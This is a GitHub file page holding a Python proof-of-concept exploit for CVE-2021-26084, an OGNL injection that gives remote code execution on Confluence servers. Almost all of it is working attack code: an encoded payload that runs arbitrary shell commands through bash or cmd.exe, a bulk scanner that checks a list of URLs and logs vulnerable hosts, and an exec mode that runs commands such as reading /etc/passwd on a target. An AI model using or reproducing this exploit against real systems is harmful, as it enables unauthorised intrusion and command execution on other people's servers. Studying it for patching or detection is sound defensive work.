forked from 0xf4n9x/CVE-2021-26084
-
Notifications
You must be signed in to change notification settings - Fork 0
/
PoC.py
89 lines (77 loc) · 4.72 KB
/
PoC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
#!/usr/bin/env python3
# -*- encoding: utf-8 -*-
"""
@File : PoC.py
@Time : 2021/09/01 14:16:26
@Author : _0xf4n9x_
@Version : 1.0
@Contact : fanq.xu@gmail.com
"""
import requests
import sys
import os
import urllib3
import argparse
from bs4 import BeautifulSoup
urllib3.disable_warnings()
def usage():
print("Eg: \n python3 PoC.py -u http://127.0.0.1")
print(" python3 PoC.py -u httts://127.0.0.1 -e 'cat /etc/passwd'")
print(" python3 PoC.py -f urls.txt")
def poc(host):
url = host + "/pages/doenterpagevariables.action"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
"Content-Type": "application/x-www-form-urlencoded"}
params = {"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022ifconfig\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
try:
res = requests.post(url, headers=headers, data=params,
timeout=10, verify=False)
if 'netmask' and 'inet' and 'netmask' in res.text:
print("[+] " + host + " is vulnerable!")
return 1
else:
print("[-] " + host + " is not vulnerable!")
except:
pass
def exp(host, command):
url = host + "/pages/doenterpagevariables.action"
headers = {
"User-Agent": "Mozilla/5.0 (X11; Gentoo; rv:82.1) Gecko/20100101 Firefox/82.1",
"Content-Type": "application/x-www-form-urlencoded"}
params = {
"queryString": "aaaaaaaa\\u0027+{Class.forName(\\u0027javax.script.ScriptEngineManager\\u0027).newInstance().getEngineByName(\\u0027JavaScript\\u0027).\\u0065val(\\u0027var isWin = java.lang.System.getProperty(\\u0022os.name\\u0022).toLowerCase().contains(\\u0022win\\u0022); var cmd = new java.lang.String(\\u0022" + command + "\\u0022);var p = new java.lang.ProcessBuilder(); if(isWin){p.command(\\u0022cmd.exe\\u0022, \\u0022/c\\u0022, cmd); } else{p.command(\\u0022bash\\u0022, \\u0022-c\\u0022, cmd); }p.redirectErrorStream(true); var process= p.start(); var inputStreamReader = new java.io.InputStreamReader(process.getInputStream()); var bufferedReader = new java.io.BufferedReader(inputStreamReader); var line = \\u0022\\u0022; var output = \\u0022\\u0022; while((line = bufferedReader.readLine()) != null){output = output + line + java.lang.Character.toString(10); }\\u0027)}+\\u0027"}
res = requests.post(url, headers=headers, data=params,
timeout=10, verify=False).text
soup = BeautifulSoup(res, "html5lib")
content = soup.find(method="POST").find_all('input')[1]["value"]
print(content.replace('aaaaaaaa[', '').replace('\n]', ''))
if __name__ == '__main__':
parser = argparse.ArgumentParser(
description="CVE-2021-26084 Remote Code Execution on Confluence Servers")
parser.add_argument('-u', '--url', type=str,
help="vulnerability verification for individual websites")
parser.add_argument('-e', '--exec', type=str,
help="command execution")
parser.add_argument('-f', '--file', type=str,
help="perform vulnerability checks on multiple websites in a file, and the vulnerable websites will be output to the success.txt file")
args = parser.parse_args()
if len(sys.argv) == 3:
if sys.argv[1] in ['-u', '--url']:
poc(args.url)
elif sys.argv[1] in ['-f', '--file']:
if os.path.isfile(args.file) == True:
with open(args.file) as target:
hosts = []
hosts = target.read().splitlines()
for host in hosts:
if poc(host) == 1:
with open("success.txt", "a+") as f:
f.write(host + "\n")
elif len(sys.argv) == 5:
if set([sys.argv[1], sys.argv[3]]) < set(['-u', '--url', '-e', '--exec']):
if poc(args.url) == 1:
exp(args.url, args.exec)
else:
parser.print_help()
usage()